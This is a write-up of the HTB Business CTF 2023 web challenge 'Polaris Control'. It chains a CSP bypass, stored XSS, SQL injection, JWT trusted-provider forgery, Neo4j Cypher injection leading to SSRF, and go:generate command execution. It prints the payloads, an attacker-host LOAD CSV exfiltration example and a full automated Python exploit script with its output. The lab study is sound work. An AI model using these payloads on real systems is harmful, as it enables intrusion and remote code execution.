Polaris Control
Challenge
- CTF: HTB Business CTF 2023: The Great Escape
- Name: Polaris Control
- Category: Web
- Difficulty: Medium
- Points: 1000
- Description: During the Dark War, the Zenium State, facing resource scarcity, sought to hack into Arodor’s notorious malware command and control system, Polaris Control, to gain an advantage in the Mars space race. State hackers have contacted you claiming to have spotted a small programming error by performing tedious enumeration, can you help them escalate it?
Files
Download: web_polaris_control.zip
Synopsis
The Flask web application had a Command & Control Dashboard interface that provided Moderator/Administrative access for registering/updating implants. This challenge required identifying and exploiting multiple vulnerabilities to achieve full code-execution. The challenge started off with identifying a Content SEcurity Policy bypass via an image upload when updating an implant. During this update, we coud add a Cross-Site Scripting (XSS) Payload that a moderator bot would trigger. In this payload we exploit a SQL injection vulnerability on a moderator-only accessible endpoint to add a generated JWT keypair to the internal Trusted Provider store. This gave us access to administrator endpoint that had a Neo4j Cypher Injection that could be abused to lead to Server-Side Request Forgery (SSRF) that could be abused to trigger a Golang implant to compile that we had partial control of the source code with. This limited source-code injection could be abused to achieve Remote Code Execution via a Golang directive of called go:generate
.
Initial Analysis
You can spin this up via docker and it will be hosted at http://127.0.0.1:1337 or http://172.17.0.3:1337
1
sudo ./build-docker.sh
When browsing to the site for the first time you just receive a JSON response: {"message":"200 OK"}
There are three Flask blueprints specified in the source-code at application/main.py
:
1
2
3
app.register_blueprint(comms, url_prefix="/comms")
app.register_blueprint(panel, url_prefix="/panel")
app.register_blueprint(provider, url_prefix="/provider")
We can also identify routes in each blueprint using VSCode:
At the panel endpoint, we get a login screen: http://localhost:1337/panel/login
Using the docker, we can get the moderator login creds:
1
2
3
/app # tr '\0' '\n' < /proc/222/environ | sort -u | grep -i moderator
MODERATOR_PASSWORD=2d2959e82e89b669b329c2926d32839f
MODERATOR_USER=lean
Logging in as a moderator we can see the panel home screen that displays all the implants:
MySQL Database Inspection
Looking into the database, we see one database called polaris_control
and three tables:
implants
trusted_external_token_providers
users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ sudo docker exec -it web_polaris_control sh
$ mysql polaris_control
MariaDB [polaris_control]> show tables;
+----------------------------------+
| Tables_in_polaris_control |
+----------------------------------+
| implants |
| trusted_external_token_providers |
| users |
+----------------------------------+
3 rows in set (0.000 sec)
MariaDB [polaris_control]> select * from users;
+------------+----------+--------------------------------------------------------------+--------------+
| identifier | username | password | account_type |
+------------+----------+--------------------------------------------------------------+--------------+
| 1 | lean | $2b$12$CvmRWIEbUtNTaDSEIGrNJOoBoKo95XAB1VvqX7G17HSwIG9US8OXG | moderator |
+------------+----------+--------------------------------------------------------------+--------------+
MariaDB [polaris_control]> select * from implants;
+------------------------------------------------------------------+------------------------------------------------------------------+-----------------+----------------------+---------+-------------+------+----------+--------------------+--------+-----------------------------+---------------------+---------------------+
| identifier | token | ip_address | region | version | antivirus | arch | platform | hostname | rights | image_url | last_login | installation_date |
+------------------------------------------------------------------+------------------------------------------------------------------+-----------------+----------------------+---------+-------------+------+----------+--------------------+--------+-----------------------------+---------------------+---------------------+
| 868d150a0fe1bd98e9b6b65c84baed5afd6676d7f7cbed4e7d45b166d863bc35 | 6b513c1f8f021f0205773a600203378e5636012fed334d008235f5a7d4e18a3a | 165:113:66:54 | Shadow Nexus | 2.4.4 | N/A | x32 | linux | arch-workstation | root | /static/uploads/linux.png | 2023-04-16 12:45:26 | 2023-04-16 12:45:26 |
...[snip]...
MariaDB [polaris_control]> select * from trusted_external_token_providers;
+------------+------------------------------------------+
| identifier | host_url |
+------------+------------------------------------------+
| 1 | http://127.0.0.1:1337/provider/jwks.json |
+------------+------------------------------------------+
We need to look into if there are any vulnerabilities to get us to write to the database to add a user, add a implant, or add a trusted external token provider.
Browsing to the token provider URL, we can get the RSA public key (n, e):
1
2
3
4
5
6
7
8
9
10
11
12
13
$ curl -s http://127.0.0.1:1337/provider/jwks.json | jq .
{
"keys": [
{
"kty": "RSA",
"alg": "RS256",
"use": "sig",
"kid": "1",
"n": "3H7ASpJeLNbId2KiQSQJ1DjxrDfeKEI7XCRc1zT6E3yo9m-BT3wRBNLBqWBNJVAydeLrhKTGDTaLEb3EJonWGtRQ0pYsTV-W-NUFWp0du5pjvuMGJE5ZDx1Olm12ESnyJIplV64f0uDE_F0sfTwsS5syvGosgirbf0i-VTGEUgHSrQOAqVpuvvMsbY9tI21-uHabTffNM3r8hATcuN2vGbDIIbFCKoDQvZrem1YPYeqf7_j4r9RX-VfeAeAFeNwHCdmLL9-J-HSFP31LcRddlowHxrgvQve2krC_PQ58KUvfCAVtUBjwhoAjtzRrUyqbS-3PoqSM-acyN4O7cX3Zdw",
"e": "AQAB"
}
]
}
Vulnerability Identification
Looking at the challenge source-code we can identify some vulnerabilities:
Vuln 1 - SQL Injection
Thanks to Synk, we identify a SQL injectable query in application/blueprints/panel.py
when sending a POST request to /home
as a moderator. This calls the function mysql_interface.search-implant(field, query_eq, query_like
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
@panel.route("/home", methods=["GET", "POST"])
@moderator_middleware
def home():
server_info = machine_info()
mysql_interface = MysqlInterface(current_app.config)
statistics = mysql_interface.fetch_implant_statistics()
implants = None
if request.method == "GET":
implants = mysql_interface.fetch_implant_data()
if request.method == "POST":
field = request.form.get("field")
query_eq = request.form.get("query_eq")
query_like = request.form.get("query_like")
if not field or not query_eq:
return response("Missing parameters"), 400
if not query_like:
query_like = query_eq
implants = mysql_interface.search_implants(field, query_eq, query_like)
return render_template(
"home.html",
title="Home",
nav_enabled=True,
user_data=request.user_data,
statistics=statistics,
implant_data=implants,
server_info=server_info,
)
The search_implants
function is defined in application/util/mysql.py
that appends user input and doesn’t use parameterized queries.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
def search_implants(self, column, query_eq, query_like):
available_columns = [
"identifier",
"region",
"platform",
"hostname",
"installation_date" "version",
"antivirus",
]
if not column in available_columns:
return False
query_eq = html.escape(query_eq)
query_like = html.escape(query_like)
implants = self.query(
f"SELECT * FROM implants WHERE {column} = '{query_eq}' OR {column} LIKE '{query_like}%'",
multi=True,
)[0]
if len(implants) < 1:
return False
return implants
If we find a way to become a moderator, we could use a SQL injection payload to add our URL to the trusted_external_token_providers
table such as: ; INSERT INTO polaris_control.trusted_external_token_providers (host_url) VALUES (CHAR({encoded_trusted_provider})) -- -
Vuln 2 - Jinja Safe Filter
In the application/templates/implant.html
Jinja template, every parameter includes the | safe
filter. This is used to indicate that the data passed to it should be considered safe and should not be auto-escaped. Auto-escaping is a feature that automatically escapes special characters in the data to prevent potential security vulnerabilities, such as Cross-Site Scripting (XSS) attacks. By default, Jinja2 automatically escapes variables rendered in the templates to ensure that any user-input data is safe to be displayed on the web page. However, there might be cases where you have already sanitized or trusted the data, and you want to display it as is, without Jinja2 automatically escaping it. In such cases, you can use the safe filter to tell Jinja2 not to escape the data.
1
2
3
4
5
6
7
8
9
10
<p><b>IP: </b>{{ implant_data['ip_address'] | safe }}</p>
<p><b>Region: </b>{{ implant_data['region'] | safe }}</p>
<p><b>Version: </b>{{ implant_data['version'] | safe }}</p>
<p><b>AV: </b>{{ implant_data['antivirus'] | safe }}</p>
<p><b>Architecture: </b>{{ implant_data['arch'] | safe }}</p>
<p><b>OS: </b>{{ implant_data['platform'] | safe }}</p>
<p><b>Hostname: </b>{{ implant_data['hostname'] | safe }}</p>
<p><b>Privileges: </b>{{ implant_data['rights'] | safe }}</p>
<p><b>Last seen: </b>{{ implant_data['last_login'] | safe }}</p>
<p><b>Installed on: </b>{{ implant_data['installation_date'] | safe }}</p>
We will keep this in mind, as if we can control any of these implant_data fields, we could potentially exploit an XSS attack.
Vuln 3 - Image Upload CSP Bypass + XSS
In application/blueprints/communications.py
we notice a Content Security Policy (CSP) Python decorator called csp_middleware
that sets the policy based on an image_url
.
We can use https://csp-evaluator.withgoogle.com/ to evaluate the current Content Security Policy (CSP) policy.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
def csp_middleware(func):
def set_csp(*args, **kwargs):
pattern = r"/panel/implant/(\w+)"
match = re.search(pattern, request.url)
image_url = None
if match:
mysql_interface = MysqlInterface(current_app.config)
image_url = mysql_interface.fetch_implant_by_identifier(match.group(1))[
"image_url"
]
img_policy = f"'self' {image_url[1:]}" if image_url else "'self'"
response = make_response(func(*args, **kwargs))
response.headers[
"Content-Security-Policy"
] = f"default-src 'self'; frame-ancestors 'none'; object-src 'none'; base-uri 'none'; img-src {img_policy};"
return response
set_csp.__name__ = func.__name__
return set_csp
The image_url
is set in to "/static/uploads/" + image_filename
via update_implant()
that defines the POST endpoint to comms/update/<identifier>/<token>
that is used to upload PNG files from an implant. We can append our own CSP via the image_filename
as this is controllable. The ; script-src 'unsafe-inline' 'unsafe-eval' ;
CSP bypass allows unsafe-inline
script execution in HTML elements. This policy is insecure and would allow the execution of arbitrary scripts inline within the HTML.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
@comms.route("/update/<identifier>/<token>", methods=["POST"])
@implant_middleware
def update(identifier, token):
if not identifier or not token:
return response("Missing parameters"), 400
if "image" not in request.files:
return response("No image"), 400
image_file = request.files["image"]
if image_file.filename == "":
return response("No selected image"), 400
if not allowed_file(image_file.filename, current_app.config["ALLOWED_EXTENSIONS"]):
return response("Invalid image extension"), 403
mysql_interface = MysqlInterface(current_app.config)
authenticated = mysql_interface.check_implant(identifier, token)
if not authenticated:
return response("Unauthorized"), 401
data = request.form
if (
not "version" in data
or not "antivirus" in data
or not "arch" in data
or not "platform" in data
or not "hostname" in data
or not "rights" in data
):
return response("Missing parameters"), 400
image_filename = identifier + "_" + image_file.filename
image_file.save(
os.path.join(current_app.config["UPLOAD_FOLDER"] + "/", image_filename)
)
img_path = current_app.config["UPLOAD_FOLDER"] + "/" + image_filename
if not check_img(img_path):
os.remove(img_path)
return response("Invalid image"), 403
mysql_interface.update_implant(
identifier,
request.remote_addr,
random.choice(regions),
data["version"],
data["antivirus"],
data["arch"],
data["platform"],
data["hostname"],
data["rights"],
"/static/uploads/" + image_filename,
)
bot_runner(
current_app.config["MODERATOR_USER"],
current_app.config["MODERATOR_PASSWORD"],
current_app.config["BOT_AGENT_NAME"],
identifier,
)
return response("Updated"), 201
Also, when we send a POST request to /update/<identifier>/<token>
, there is an UPDATE MySQL query to update the implant data including image_url
.
1
2
3
4
5
6
7
8
9
10
11
12
mysql_interface.update_implant(
identifier,
request.remote_addr,
random.choice(regions),
data["version"],
data["antivirus"],
data["arch"],
data["platform"],
data["hostname"],
data["rights"],
"/static/uploads/" + image_filename,
)
The update_implant
function is defined in application/util/mysql.py
that takes the user controlled image_url
which is defined above as "/static/uploads/" + image_filename
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
def update_implant(
self,
identifier,
ip_address,
region,
version,
antivirus,
arch,
platform,
hostname,
rights,
image_url,
):
self.query(
"UPDATE implants SET ip_address = %s, region = %s, version = %s, antivirus = %s, arch = %s, platform = %s, hostname = %s, rights = %s, image_url = %s, last_login = %s WHERE identifier = %s",
(
ip_address,
region,
version,
antivirus,
arch,
platform,
hostname,
rights,
image_url,
datetime.now(),
identifier,
),
)
self.connection.commit()
return True
After, a bot is spawned running as a moderator. This will check the implant at /panel/implant/<identifier>
1
2
3
4
5
6
bot_runner(
current_app.config["MODERATOR_USER"],
current_app.config["MODERATOR_PASSWORD"],
current_app.config["BOT_AGENT_NAME"],
identifier,
)
We could potentially add a Cross-Site Scripting (XSS) payload during the implant update POST request at /comms/update/{implant_id}/{implant_token}
and can make the moderator add our generated RSA Token to the trusted_external_token_providers
table in the database like discussed in Vuln 1. We serve it using a Python3 webserver at http://172.17.0.1/jwks.json and this will allow us access to administrative endpoints.
1
2
3
4
5
6
7
8
9
10
<script>
let formData = new FormData();
formData.append("field", "identifier");
formData.append("query_eq", "\\\\");
formData.append("query_like", "{sqli_payload}");
fetch("/panel/home", {{
body: formData,
method: "post"
}});
</script>
Vuln 4 - Admin Neo4J Cypher Injection to Golang Generate RCE
In application/util/neo4j.py
, we notice a Neo4j search query that has user controlled input directly concatenated to it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def search_implant_connections(self, search_query=None):
implants = self.query(
f"""
MATCH (i1:Implant)-[:CONNECTED_TO]->(i2:Implant)
WHERE i1.identifier = '{search_query}' OR i2.identifier = '{search_query}'
RETURN i1.identifier AS identifier1, i2.identifier AS identifier2
/*Fetches all connections for a select implant*/
"""
)
connections = []
for record in implants:
connection = {
"identifier1": record["identifier1"],
"identifier2": record["identifier2"],
}
connections.append(connection)
return connections
Reviewing https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j, we can find an example payload to inject into this query: Injectable query: MATCH (o) WHERE o.Id='{input}'
Injection: ‘ OR 1=1 WITH 0 as _l00 {…} RETURN 1 //
However, the more interesting injection is exfiling information to the attacker controlled domain: LOAD CSV FROM 'https://attacker.com/'
Using this same type of injection, we potentially could make the Server send a request to any endpoint, including localhost only accessible ones such as /server
defined in application/blueprints/panel.py
as shown below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
@panel.route("/server", methods=["GET"])
@localhost_middleware
@administrator_middleware
def server():
server_url = request.args.get("server_url")
if not server_url:
return render_template(
"server.html",
title="Builder",
nav_enabled=True,
user_data=request.user_data,
)
return send_file(
build_implant(
current_app.config["IMPLANT_SRC_PATH"],
current_app.config["IMPLANT_SRC_FILE"],
server_url,
)
)
This endpoint calls a function to build an implant via the function build_implant()
as defined in application/util/general.py
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
def build_implant(implant_path, implant_file, server_url):
implant_id = generate(32)
new_build_dir = f"/tmp/{implant_id}"
os.mkdir(new_build_dir)
os.system(f"cp {implant_path}/* {new_build_dir}")
implant_file = open(f"{new_build_dir}/{implant_file}", "r")
implant_src = implant_file.read()
implant_file.close()
implant_src = implant_src.replace("SERVER_URL", server_url)
new_src_path = f"/{new_build_dir}/{implant_id}.go"
new_src_file = open(new_src_path, "w")
new_src_file.write(implant_src)
new_src_file.close()
os.system(f"go generate -x {new_src_path}")
os.system(
f"go build -C {new_build_dir} -o {new_build_dir}/{implant_id} {new_src_path}"
)
return f"{new_build_dir}/{implant_id}"
This will then replace the SERVER_URL
in the implant Go application with user controlled input, and then compile it via go generate -x {new_src_path}
. Looking into how we can exploit this, we find a Golang directive called go:generate
which is used to generate Golang source code. To use it, you have to put a line in any Golang file : //go:generate command argument
and will perform code execution at the command / argument you tell it to run. We can abuse this to make the /flag*
accessible to via the static folder where everyone can reach /static/flag.txt
using Python os.system
:
1
//go:generate python -c "import os;os.system('cp /flag* /app/application/static/flag.txt')"
After perfecting this injection, you can see the output Go file within the Docker instance:
1
$ cat /tmp/517d44e68b4e2d6a4445233b8ae43c9a2dabab2d613283077d0ce836f8028852/517d44e68b4e2d6a4445233b8ae43c9a2dabab2d613283077d0ce836f8028852.go
1
2
3
4
5
6
7
8
9
10
func main() {
const version = "3.12.5"
const userAgent = "Polaris Control/" + version
const configPath string = "/tmp/polaris.conf"
const screenshotPath string = "/tmp/screenshot.png"
const apiURL string = ""
//go:generate python -c "import os;os.system('cp /flag* /app/application/static/flag.txt')"
var a string = ""
...[snip]..
The following Neo4j Cypher Injection to Server-Side Request Forgery payload was used: f"' OR True LOAD CSV FROM 'http://127.0.0.1:1337/panel/server?server_url={GOLANG_RCE}&token={new_jwt}' AS y RETURN '' AS identifier1, '' AS identifier2/*"
Where
GOLANG_RCE
was'"\n\t//go:generate python -c "import os;os.system(\'cp /flag* /app/application/static/flag.txt\')"\n\tvar a string = "'
token
was our JWT token (i.e.eyJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly8xNzIuMTcuMC4xL2p3a3MuanNvbiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImxlYW4iLCJhY2NvdW50X3R5cGUiOiJhZG1pbmlzdHJhdG9yIn0.fWV8_tIfzlxKRY71hVSDKUDhhoOR4rbjZaqUHcc0p4mU2hjtVQkUYDJZu9snHBNHc91wSQdWm6Hbcw03oZhCI-8nZ1Pnh2oBA3LALNyCYAKFRHda3slYq8qjoACD4qrtSSimotxxFmH0Snc8pv9WbwvtCeiDuUQGaWIUmhopztoDZqbbsyhKYZ7LtB3YKfj2hpxUVoHOConbsoM9B1BHK9rahcSShtmmx6y0TU6AZtqchwCOEow-lC1z6cUC5uaEXy2pTIbQnblbzJ75PQDOzO8u8Sr5koJt-vwH1_drbZ7HVBwZFZgAZnxqZawallufLn3R_5wR7ESiEkXK8RQTqQ
)
Automated Python Kill-Chain Script
To abuse all the vulnerabilities identified above, we made a custom python attack script as shown below:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Imports
from requests import Session
from multiprocessing import Process
from urllib.parse import quote_plus
from flask import Flask
from time import sleep
# Challenge URLs
CHALLENGE_IP, CHALLENGE_PORT = "127.0.0.1", 1337
CHALLENGE_URL = f"http://{CHALLENGE_IP}:{CHALLENGE_PORT}"
# Host URLS
HOST_IP = "172.17.0.1"
HOST_PORT = 80
if HOST_PORT == 80:
HOST_URL = f"http://{HOST_IP}"
else:
HOST_URL = f"http://{HOST_IP}:{HOST_PORT}"
# From application/config.py
IMPLANT_AGENT_NAME = "Polaris Control"
ALLOWED_EXTENSION = ".png"
# Setup web session
session = Session()
session.verify = False # Self-signed certificate remove-validation
session.proxies.update(
{"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
)
session.headers.update({"User-Agent": IMPLANT_AGENT_NAME})
def generate_keypair(file_path):
"""Generate an RSA key pair and save the public key as JWKS JSON.
Reference: application/util/jwt.py
Args:
file_path (str): The file path to save the JWKS JSON.
Returns:
str: The PEM-formatted private key.
"""
import base64
import json
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
# Generate an RSA private key with a public exponent of 65537 and key size of 2048 bits.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
# Convert the private key to PEM format.
pem_private_key = private_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
).decode()
# Get the public key components (n and e) and convert them to base64url format.
public_numbers = private_key.public_key().public_numbers()
n_base64 = (
base64.urlsafe_b64encode(
public_numbers.n.to_bytes((public_numbers.n.bit_length() + 7) // 8, "big")
)
.rstrip(b"=")
.decode()
)
e_base64 = (
base64.urlsafe_b64encode(
public_numbers.e.to_bytes((public_numbers.e.bit_length() + 7) // 8, "big")
)
.rstrip(b"=")
.decode()
)
# Create the JSON Web Key Set (JWKS) containing the public key information.
jwks = {
"keys": [
{
"kty": "RSA",
"alg": "RS256",
"use": "sig",
"kid": "1",
"n": n_base64,
"e": e_base64,
}
]
}
# Save the JWKS as JSON to the specified file.
with open(file_path, "w") as file:
json.dump(jwks, file)
return pem_private_key
def create_jwt(host, private_key, account_type, username):
"""Create a JWT token using an RSA private key.
Reference: application/util/jwt.py
Args:
host (str): The host URL.
private_key (str): The PEM-formatted private key.
account_type (str): The account type.
username (str): The username.
Returns:
str: The JWT token.
"""
import jwt
# Define the header for the JWT token.
header = {"alg": "RS256", "jku": host}
# Define the payload for the JWT token.
payload = {"username": username, "account_type": account_type}
# Encode the payload and sign the token using the RSA private key with RS256 algorithm.
token = jwt.encode(payload, private_key, algorithm="RS256", headers=header)
return token
def generate_png():
"""Generate a 100x100 red PNG image and return it as a BytesIO object.
Returns:
BytesIO: A BytesIO object containing the generated image.
"""
from PIL import Image
from io import BytesIO
# Create a new 100x100 image with a red background (RGB: (255, 0, 0)).
image = Image.new("RGB", (100, 100), (255, 0, 0))
# Create a BytesIO object to hold the image data.
byte_stream = BytesIO()
# Save the image in PNG format to the BytesIO buffer.
image.save(byte_stream, format="PNG")
# Reset the file pointer to the beginning of the buffer for reading.
byte_stream.seek(0)
# Return the BytesIO object containing the generated image.
return byte_stream
def post_register_implant():
"""Registers a new implant communication channel.
Reference: application/blueprints/communications.py
@comms.route("/register", methods=["POST"])
@implant_middleware
"""
data = {
"version": "1",
"antivirus": "1",
"arch": "1",
"platform": "1",
"hostname": "1",
"rights": "1",
}
response = session.post(f"{CHALLENGE_URL}/comms/register", json=data)
assert response.status_code == 200, "/register implant not registered"
registered = response.json()
implant_id = registered["identifier"]
implant_token = registered["token"]
return implant_id, implant_token
def get_check_implant(implant_id, implant_token):
"""Checks an implant communication channel.
Reference: application/blueprints/communications.py
@comms.route("/check/<identifier>/<token>", methods=["GET"])
@implant_middleware
"""
response = session.get(
f"{CHALLENGE_URL}/comms/check/{implant_id}/{implant_token}",
)
assert response.status_code == 200, "/check implant unavailable"
def post_update_implant(implant_id, implant_token):
"""Updates the implant to upload a Content-Security-Policy bypass image payload to the UPLOAD_FOLDER.
Reference: application/blueprints/communications.py
@comms.route("/update/<identifier>/<token>", methods=["POST"])
@implant_middleware
"""
data = {
"version": "1",
"antivirus": "1",
"arch": "1",
"platform": "1",
"hostname": get_xss_payload_post_panelhome(),
"rights": "1",
}
CSP_BYPASS = "; script-src 'unsafe-inline' 'unsafe-eval' ; "
new_image = {"image": (CSP_BYPASS + ALLOWED_EXTENSION, generate_png(), "image/png")}
response = session.post(
f"{CHALLENGE_URL}/comms/update/{implant_id}/{implant_token}",
data=data,
files=new_image,
)
assert response.status_code == 201, "/update implant not updated"
def get_xss_payload_post_panelhome():
"""This generates a Cross-Site Scripting (XSS) -> SQL injection payload to be run as the bot moderator on /panel/home to add a new trusted external token provider to the database.
Injection Call:
implants = mysql_interface.search_implants(field, query_eq, query_like)
Reference: application/blueprints/panel.py
@panel.route("/home", methods=["GET", "POST"])
@moderator_middleware
"""
encoded_trusted_provider = ",".join(str(ord(c)) for c in trusted_provider_url)
sqli_payload = f"; INSERT INTO polaris_control.trusted_external_token_providers (host_url) VALUES (CHAR({encoded_trusted_provider})) -- -"
xss_payload = f"""<script>
let formData = new FormData();
formData.append("field", "identifier");
formData.append("query_eq", "\\\\");
formData.append("query_like", "{sqli_payload}");
fetch("/panel/home", {{
body: formData,
method: "post"
}});
</script>"""
return xss_payload
def post_panel_network(new_jwt):
"""With a trusted administrator JWT, there is a Neo4J Cypher injectable query at POST panel/network endpoint. If using a LOAD CSV FROM, we can get the server to call /panel/server with a Golang Remote Code Execution payload that will be run with `go generate`.
Injection Call:
implant_connections = neo4j_interface.search_implant_connections(query)
Reference: application/blueprints/panel.py
@panel.route("/network", methods=["GET", "POST"])
@administrator_middleware
"""
# The injection on neo4j uses the load CSV function
GOLANG_RCE = quote_plus(
'"\n\t//go:generate python -c "import os;os.system(\'cp /flag* /app/application/static/flag.txt\')"\n\tvar a string = "'
)
neo4j_cypher_ssrf_payload = f"' OR True LOAD CSV FROM 'http://127.0.0.1:1337/panel/server?server_url={GOLANG_RCE}&token={new_jwt}' AS y RETURN '' AS identifier1, '' AS identifier2/*"
data = {"query": neo4j_cypher_ssrf_payload}
session.post(f"{CHALLENGE_URL}/panel/network", data=data, cookies={"jwt": new_jwt})
def get_flag():
"""Retrieve the flag."""
flag = session.get(f"{CHALLENGE_URL}/static/flag.txt").text
return flag
def start_flask_http(host_ip, host_port):
"""Start the Flask HTTP server.
This function initializes a Flask application instance and runs the HTTP server
on the specified host and port.
"""
# Initialize a Flask application instance using the name of the current module (__name__).
app = Flask(__name__, static_folder="", static_url_path="")
# Run the Flask HTTP server on the specified host and port.
# The server will start listening for incoming requests once this function is called.
app.run(host=host_ip, port=host_port)
if __name__ == "__main__":
# Create a new process to run the Flask HTTP server.
print("[*] Starting Flask webserver ...")
flask_process = Process(target=start_flask_http, args=(HOST_IP, HOST_PORT))
flask_process.start()
sleep(1)
# Create Keypair / JWT
print("[*] Creating JWT keypair for Trusted Provider ...")
jwt_filename = "jwks.json"
trusted_provider_url = f"{HOST_URL}/{jwt_filename}"
priv_key = generate_keypair(jwt_filename)
attacker_jwt = create_jwt(trusted_provider_url, priv_key, "administrator", "lean")
# Register/update implant to upload image with unsafe CSP, XSS+SQli to add trusted JWT keypair.
print("[*] Registering implant ...")
implant_id, implant_token = post_register_implant()
print(
f"[+] Registered an implant with identifier {implant_id} / token: {implant_token}"
)
print("[*] Checking implant ...")
get_check_implant(implant_id, implant_token)
print("[*] Updating implant ...")
post_update_implant(implant_id, implant_token)
print(
f"[+] Updated implant with Content Security Policy and XSS -> SQLi to add JWT keypair to Trusted Provider store."
)
# Achieve RCE via Neo4j Cypher Injection + Golang RCE
print("[*] Updating network ...")
post_panel_network(attacker_jwt)
print(get_flag())
# Terminate server
sleep(2)
flask_process.terminate()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ python3 polaris_control.py
[*] Starting Flask webserver ...
* Serving Flask app 'polaris_control'
* Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on http://172.17.0.1:80
Press CTRL+C to quit
[*] Creating JWT keypair for Trusted Provider ...
[*] Registering implant ...
[+] Registered an implant with identifier 6f1b142a7b747ca0add408396921511347d75e6bb8b8aefa634385c403898516 / token: ea262cd385706afb6d16a905b32bf802ddbd49a18285b5bec7cacec0001bd993
[*] Checking implant ...
[*] Updating implant ...
[+] Updated implant with Content Security Policy and XSS -> SQLi to add JWT keypair to Trusted Provider store.
[*] Updating network ...
172.17.0.3 - - [-] "GET /jwks.json HTTP/1.1" 200 -
172.17.0.3 - - [-] "GET /jwks.json HTTP/1.1" 200 -
HTB{f4k3_fl4g_f0r_t3st1ng}